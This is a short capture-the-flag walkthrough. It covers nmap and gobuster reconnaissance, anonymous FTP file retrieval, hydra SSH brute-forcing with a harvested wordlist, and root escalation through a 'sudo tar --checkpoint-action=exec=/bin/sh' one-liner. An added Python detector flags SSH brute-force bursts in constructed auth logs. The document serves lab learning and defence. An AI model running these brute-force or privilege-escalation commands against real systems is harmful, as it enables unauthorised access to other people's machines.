sudo nmap -T4 -p- -A (ip)
- anonymous access to FTP on port 21
- HTTP page and Apache 2.4.18 server on port 80
- SSH on port 22
The web page is useful anecdotally, but there's really nothing on it we can use later, except for some names as potential usernames.
gobuster dir -w (wordlist) -u (url)
ftp (ip)
All we need to do now is read the files, so let's use the get (filename) command to download them to our machine and read them there.
Let's put the names from the web page into a file, together with the name we found in task.txt, and call it user.txt.
Since SSH is the only login service we have, the next step is to run hydra to brute-force the SSH login, using locks.txt as the password list.
hydra ssh://ip -L users.txt -P locks.txt
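The defender's view of this step, as an added example that is not part of the original write-up: a detector that flags a source IP producing a burst of failed SSH password attempts across several usernames, and reports any account that was then logged into from that IP. It assumes OpenSSH's default "Failed password" / "Accepted password" log messages; the sample lines, usernames and IP addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd lines (auth.log style); names and IPs are made up.
SAMPLE_LOG = """\
Jan 10 12:00:01 host sshd[1001]: Failed password for invalid user alice from 203.0.113.5 port 40001 ssh2
Jan 10 12:00:02 host sshd[1002]: Failed password for invalid user bob from 203.0.113.5 port 40002 ssh2
Jan 10 12:00:03 host sshd[1003]: Failed password for carol from 203.0.113.5 port 40003 ssh2
Jan 10 12:00:04 host sshd[1004]: Failed password for invalid user alice from 203.0.113.5 port 40004 ssh2
Jan 10 12:00:05 host sshd[1005]: Failed password for invalid user bob from 203.0.113.5 port 40005 ssh2
Jan 10 12:00:06 host sshd[1006]: Failed password for carol from 203.0.113.5 port 40006 ssh2
Jan 10 12:00:07 host sshd[1007]: Accepted password for carol from 203.0.113.5 port 40007 ssh2
Jan 10 12:05:00 host sshd[1010]: Failed password for dave from 198.51.100.7 port 50001 ssh2
Jan 10 12:05:10 host sshd[1011]: Accepted password for dave from 198.51.100.7 port 50002 ssh2
"""

LINE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def detect_bruteforce(log, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {ip: details} for IPs with >= threshold failed logins inside `window`."""
    failed, accepted = defaultdict(list), defaultdict(list)
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is assumed for parsing.
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        bucket = failed if m.group(2) == "Failed" else accepted
        bucket[m.group(4)].append((ts, m.group(3)))
    alerts = {}
    for ip, events in failed.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over failure times
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "failures": len(events),
                    "users": sorted({u for _, u in events}),
                    # A success from the same IP after the failures began
                    "compromised": sorted({u for t, u in accepted[ip] if t >= events[0][0]}),
                }
                break
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

A single mistyped password followed by a successful login, like the second source in the sample, stays below the threshold and is not reported.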
Getting root directly is impossible at the moment, because we are currently just the user ***.
Go to GTFOBins and search for tar.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh